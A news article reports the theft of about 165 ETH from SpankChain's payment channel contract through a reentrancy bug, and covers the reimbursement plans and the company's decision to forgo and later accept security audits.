It appears that even the most intimate of blockchain platforms aren’t safe from the ever-growing wave of large-scale hacks on the cryptocurrency and blockchain community. Yesterday, adult entertainment blockchain platform Spankchain announced in a blog post that on Saturday evening, while many were no doubt winding down from their challenging workweek, hackers stole 165.38 ETH (~$38,000) from the company’s payment channel smart contract. This resulted in additional $4,000 worth of BOOTY on the contract becoming immobilized.
“Of the stolen/immobilized ETH/BOOTY, 34.99 ETH (~$8,000) and 1271.88 BOOTY belongs to users (~$9,300 total), and the rest belonged to SpankChain,” reads the the company’s announcement.
SpankChain reports that it hadn’t realized that the hack had taken place until the company began research into non-related smart contract bugs on the platform beginning on Sunday evening. Once the hack was detected, Spank.Live was taken offline to prevent any additional funds from being deposited into the payment channels smart contract.
“Our immediate priority has been to provide complete reimbursements to all users who lost funds,” reads yesterday’s blog post. “We are preparing an ETH airdrop to cover all $9,300 worth of ETH and BOOTY that belonged to users. Funds will be sent directly to users’ SpankPay accounts, and will be available as soon as we reboot Spank.Live.”
The camsite is expected to be down for the next 2-3 days, and possibly longer. SpankChain is planning on redeploying the payment channel smart contract with a patch to prevent future hacks and update Spank.live to use the new payment channel contract. All of the ETH and BOOTY lost in the attack will be returned to SpankPay accounts in an upcoming airdrop. The SpankChain team is preparing an in-depth investigation into the attack.
According to the announcement,
“By the time we reboot Spank.Live, all viewers and performers will have 100% of the total value in BOOTY+ETH they had in their SpankPay airdropped to their current SpankPay addresses, so users don’t need to do anything.
The site will continue to function exactly as it was before with a single exception — because of the 4,000 BOOTY currently immobilized, we will temporarily reduce the BOOTY limit for each viewer to 10 BOOTY. This means viewers will only be able to tip 10 BOOTY at a time, and upon spending all 10 BOOTY they will automatically recharge their 10 BOOTY with any extra ETH they have deposited, until they completely deplete their ETH balance.”
The attack capitalized on a “reentrancy” bug on the SpankChain platform, similar to the bug exploited in the DAO hack.
“The attacker created a malicious contract masquerading as an ERC20 token, where the ‘transfer’ function called back into the payment channel contract multiple times, draining some ETH each time,” the company reports.
SpankChain has openly stated that it made the decision to pass on a security audit for one of its previous unidirectional payment channel contracts this year by Zeppelin, which would have cost $17,000. At the time, the payment channel contract had yet to exceed $17,000.
In the wake of this weekend’s attack, Zeppelin has quoted an audit of a separate and more sophisticated non-custodial SpankChain payment channel contract to be between $30,00-$50,00, which SpankChain has accepted.
“As we move forward and grow, we will be stepping up our security practices, and making sure to get multiple internal audits for any smart contract code we publish, as well as at least one professional external audit,” SpankChain stated.